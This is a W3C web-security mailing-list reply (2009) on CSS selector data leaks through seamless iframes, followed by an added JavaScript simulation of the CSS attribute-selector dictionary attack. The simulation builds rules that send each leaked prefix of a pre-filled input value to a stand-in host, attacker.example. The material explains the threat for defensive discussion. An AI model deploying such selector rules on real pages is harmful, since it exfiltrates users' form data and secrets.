W3C home > Mailing lists > Public > public-web-security@w3.org > December 2009

Re: Seamless iframes + CSS3 selectors = bad idea

From: Adam Barth <w3c@adambarth.com>
Date: Tue, 8 Dec 2009 01:38:24 -0800
Message-ID: <7789133a0912080138s518cc807u92565d15c930f238@mail.gmail.com>
To: gaz Heyes <gazheyes@gmail.com>
Cc: Daniel Glazman <daniel@glazman.org>, Thomas Roessler <tlr@w3.org>, public-web-security@w3.org
On Tue, Dec 8, 2009 at 1:35 AM, gaz Heyes <gazheyes@gmail.com> wrote:
> 2009/12/8 Adam Barth <w3c@adambarth.com>
>>
>> That seems to address the proximate issue, but it feels like
>> blacklisting.  Are there other related attacks we're not thinking of
>> that would make sense to address at the same time?
>
> Well, my POC used a dictionary attack to get the value of the first name text
> field. There could be information disclosure issues in future. These could
> be mitigated by limiting the amount of external requests.

I doubt that limiting the external requests is a viable approach.  I'm
not aware of any success stories about preventing exfiltration in the
web platform.  The platform just has way too many ways to send data.

As for other variations, how do these selectors interact with
contentEditable, for example?  Also, what about confidential
information written in the page, like account numbers or social
security numbers?  I don't see why all the secrets must necessarily be
stored in value attributes of input elements.

Adam
Received on Tuesday, 8 December 2009 09:39:17 GMT
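The dictionary attack gaz Heyes refers to above, reconstructed as an added example. This is not the POC from the thread and not code from either author: the attacker endpoint URL, the field name "firstname", the pre-filled value "gareth" and the tiny selector matcher that stands in for the browser's CSS engine are all constructed here so the simulation runs offline under Node. The technique itself is the one the thread subject names: a stylesheet the attacker controls (applied to the framed document via a seamless iframe) carries one rule per candidate value prefix, and only the rule whose `[value^="..."]` selector matches causes the browser to fetch that rule's background-image URL, which leaks the matched prefix one character per round.

```javascript
// Added example, not code from the mailing-list thread. Simulates the CSS
// attribute-selector dictionary attack against a pre-filled <input> value.
// The DOM element, the selector matcher and the attacker "server" log are
// constructed stand-ins so this runs without a browser.

const CHARSET = "abcdefghijklmnopqrstuvwxyz";
// Hypothetical collection endpoint; each leaked prefix becomes a query value.
const ATTACKER = "https://attacker.example/leak";

// The stylesheet an attacker injects for one round: one rule per candidate
// next character, keyed on the prefix recovered so far. In a real attack each
// rule would read `selector { background-image: url(url) }`.
function buildRules(fieldName, knownPrefix, charset = CHARSET) {
  return Array.from(charset, (ch) => {
    const guess = knownPrefix + ch;
    return {
      selector: `input[name="${fieldName}"][value^="${guess}"]`,
      url: `${ATTACKER}?v=${encodeURIComponent(guess)}`,
      guess,
    };
  });
}

// Minimal stand-in for browser selector matching: a tag name followed by
// [attr="v"] (exact) and [attr^="v"] (prefix) attribute tests. CSS matches
// the markup attribute, not the live .value property, which is why the attack
// works on server-pre-filled fields.
function selectorMatches(selector, element) {
  const tag = selector.match(/^[a-zA-Z]+/)[0];
  if (element.tag !== tag) return false;
  const attrRe = /\[([a-zA-Z-]+)(\^?=)"([^"]*)"\]/g;
  let m;
  while ((m = attrRe.exec(selector)) !== null) {
    const [, name, op, val] = m;
    const actual = element.attrs[name];
    if (actual === undefined) return false;
    if (op === "=" && actual !== val) return false;
    if (op === "^=" && !actual.startsWith(val)) return false;
  }
  return true;
}

// One page load with the injected stylesheet: the browser requests the
// background-image URL of every rule whose selector matches. The returned
// list is what the attacker's server sees in its access log.
function applyStylesheet(rules, element) {
  return rules
    .filter((r) => selectorMatches(r.selector, element))
    .map((r) => r.url);
}

// Drive the attack round by round. Each round leaks exactly one more
// character; it stops when no candidate matches (end of the value, or a
// character outside the guessed charset).
function recoverValue(element, fieldName, maxLen = 64) {
  let known = "";
  let requests = 0;
  for (let i = 0; i < maxLen; i++) {
    const rules = buildRules(fieldName, known);
    const leaked = applyStylesheet(rules, element);
    requests += leaked.length;
    if (leaked.length === 0) break;
    known = rules.find((r) => r.url === leaked[0]).guess;
  }
  return { value: known, requests };
}

// Constructed victim DOM: a first-name field pre-filled by the server.
const victimInput = {
  tag: "input",
  attrs: { name: "firstname", type: "text", value: "gareth" },
};

const result = recoverValue(victimInput, "firstname");
console.log(`recovered "${result.value}" in ${result.requests} outbound requests`);
```

Two things the simulation makes concrete. First, the cost of the attack is one matching request per recovered character, not one per candidate, because a browser only fetches the background image of a rule that actually applies; a request budget would have to be smaller than the secret's length to stop it. Second, the selector matches the `value` content attribute as written in the markup, so what leaks is whatever the server pre-filled, not what the user later typed.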